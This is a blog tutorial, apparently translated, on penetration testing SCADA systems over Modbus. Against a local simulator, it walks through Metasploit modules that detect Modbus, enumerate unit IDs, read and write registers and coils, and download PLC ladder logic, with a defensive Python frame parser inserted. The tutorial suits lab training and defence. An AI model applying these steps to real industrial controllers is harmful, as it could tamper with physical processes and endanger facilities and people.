SCADA System Penetration Testing: Modbus


Introduction

SCADA (Supervisory Control And Data Acquisition) is a system for data acquisition and supervisory control. SCADA systems are computer-based DCS and power-automation monitoring systems; they are used across many fields, including data acquisition, supervisory control and process control in power, metallurgy, petroleum, chemicals, gas and railways.

Common communication ports

modbus        port 502
dnp           port 19999
dnp3          port 20000
fieldbus      port 1089-91
ethernet/IP   port 2222
etherCAT      port 34980
profinet      port 34962-64

The Modbus protocol

Modbus is a serial communication protocol published in 1979 by Modicon (now Schneider Electric) for communicating with programmable logic controllers (PLCs). Modbus has become the de facto industry standard communication protocol in the industrial sector and is now a common way of connecting industrial electronic devices. It is also a protocol widely used in SCADA systems.

Discovery

Searching for modbus in msf

msf5 > search modbus

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/scada/modicon_command 2012-04-05 normal No Schneider Modicon Remote START/STOP Command
1 auxiliary/admin/scada/modicon_stux_transfer 2012-04-05 normal No Schneider Modicon Ladder Logic Upload/Download
2 auxiliary/scanner/scada/modbus_findunitid 2012-10-28 normal No Modbus Unit ID and Station ID Enumerator
3 auxiliary/scanner/scada/modbusclient normal No Modbus Client Utility
4 auxiliary/scanner/scada/modbusdetect 2011-11-01 normal Yes Modbus Version Scanner

Checking whether the target speaks Modbus

msf5 auxiliary(scanner/scada/modbusdetect) > exploit 

[+] 127.0.0.1:5020 - 127.0.0.1:5020 - MODBUS - received correct MODBUS/TCP header (unit-ID: 1)
[*] 127.0.0.1:5020 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Enumeration

Having confirmed that the target is actually running the Modbus protocol, the next step is to enumerate the unit IDs of the connected devices. This is similar to a ping sweep in TCP/IP, but the results are somewhat less reliable. Modbus allows up to 254 connected devices. To manipulate or communicate with any Modbus device we must have its UNIT ID, which is entirely unlike using an IP address in TCP/IP.

Enumerating device units in msf

msf5 auxiliary(scanner/scada/modbus_findunitid) > exploit 
[*] Running module against 127.0.0.1

[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 1
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 2
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 3
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 4
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 5
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 6
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 7
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 8
[+] 127.0.0.1:5020 - Received: correct MODBUS/TCP from stationID 9
....................................................................

Reading from and writing to Modbus devices

msf module

msf5 auxiliary(scanner/scada/modbusclient) > show options 

Module options (auxiliary/scanner/scada/modbusclient):

Name Current Setting Required Description
---- --------------- -------- -----------
DATA no Data to write (WRITE_COIL and WRITE_REGISTER modes only)
DATA_ADDRESS yes Modbus data address
DATA_COILS no Data in binary to write (WRITE_COILS mode only) e.g. 0110
DATA_REGISTERS no Words to write to each register separated with a comma (WRITE_REGISTERS mode only) e.g. 1,2,3,4
NUMBER 1 no Number of coils/registers to read (READ_COILS ans READ_REGISTERS modes only)
RHOSTS yes The target address range or CIDR identifier
RPORT 502 yes The target port (TCP)
UNIT_NUMBER 1 no Modbus unit number


Auxiliary action:

Name Description
---- -----------
READ_REGISTERS Read words from several registers

The module defines four actions in total:

1. READ_REGISTERS
2. WRITE_REGISTERS
3. READ_COILS
4. WRITE_COILS

UNIT_NUMBER is the unit enumerated earlier, NUMBER is the number of coils/registers to read or write, and DATA_ADDRESS is the data address.
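As an added example (not part of the original post, nor Metasploit code), the following Python parser decodes the Modbus/TCP request frames that these four actions produce, extracting the unit ID, function code, data address and count, and lists the requests that write to the device, which is what a defender watching port 502 wants to alert on. The sample frames are constructed inline, not captured from a real PLC.

```python
import struct
from dataclasses import dataclass

# Function codes behind the READ_/WRITE_ COILS/REGISTERS actions above,
# plus the single-item write variants (FC 5 and 6).
FUNCTION_NAMES = {
    0x01: "READ_COILS", 0x03: "READ_HOLDING_REGISTERS",
    0x05: "WRITE_SINGLE_COIL", 0x06: "WRITE_SINGLE_REGISTER",
    0x0F: "WRITE_MULTIPLE_COILS", 0x10: "WRITE_MULTIPLE_REGISTERS",
}
WRITE_CODES = {0x05, 0x06, 0x0F, 0x10}
@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int      # the UNIT_NUMBER the msf module targets
    function: int
    address: int
    count: int        # 1 for single-item writes

def parse_request(frame: bytes) -> ModbusRequest:
    """Decode a Modbus/TCP request ADU: 7-byte MBAP header, then the PDU."""
    if len(frame) < 12:
        raise ValueError("frame too short for MBAP header + request PDU")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:   # length covers unit id + PDU
        raise ValueError("MBAP length does not match frame size")
    fc = frame[7]
    if fc not in FUNCTION_NAMES:
        raise ValueError(f"function code 0x{fc:02x} not handled here")
    address, word = struct.unpack(">HH", frame[8:12])
    count = 1 if fc in (0x05, 0x06) else word   # FC 5/6 carry a value, not a count
    return ModbusRequest(tid, unit, fc, address, count)
def is_valid_frame(frame: bytes) -> bool:
    try:
        parse_request(frame)
        return True
    except ValueError:
        return False
def summarize_writes(frames):
    """One line per request that changes device state; reads are ignored."""
    return [f"unit {r.unit_id}: {FUNCTION_NAMES[r.function]} addr={r.address} count={r.count}"
            for r in map(parse_request, frames) if r.function in WRITE_CODES]

# Constructed sample traffic (not captured from a real device): read 10 registers
# at 100 on unit 1, write register 100 on unit 1, write 4 coils at 0 on unit 2.
SAMPLE_FRAMES = [bytes.fromhex(h) for h in (
    "00010000000601030064000a", "000200000006010600641234", "000300000008020f000000040106")]
```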

Downloading PLC ladder logic

In a SCADA/ICS network, the PLCs are the brains behind the actions that take place inside the network. These small computers are programmed to control the devices connected to them. The software program is called "ladder logic". An attacker may download and analyse a PLC's ladder logic to work out what the PLC controls and how. By understanding the logic, values can be changed in ways that may have a destructive effect on the facility.

If the ladder logic is unprotected, the program is downloaded successfully:

msf5 auxiliary(admin/scada/modicon_stux_transfer) > set MODE RECV 
MODE => RECV
msf5 auxiliary(admin/scada/modicon_stux_transfer) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 auxiliary(admin/scada/modicon_stux_transfer) > set rport 5020
rport => 5020
msf5 auxiliary(admin/scada/modicon_stux_transfer) > exploit
[*] Running module against 127.0.0.1

[*] 127.0.0.1:5020 - 127.0.0.1:5020 - MODBUS - Sending read request
[*] 127.0.0.1:5020 - 127.0.0.1:5020 - MODBUS - Retrieving file

Modbus-cli

Modbus-cli is a command-line (cli) tool that lets us read and write Modbus/TCP (not serial Modbus).

Installation

gem install modbus-cli

Help

modbus --help

Determining addresses

Values and conventions differ between devices; the figure below is only an example:

img

Reading

Read the first ten register values:

modbus read <IP> %MW100 10
modbus read <IP> 400101 10

Writing output to a text file

modbus read --output res.txt <IP> %MW100 100

Author: Sys71m
Link: https://www.sys71m.top/2019/07/24/SCADA系统渗透之modbus/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.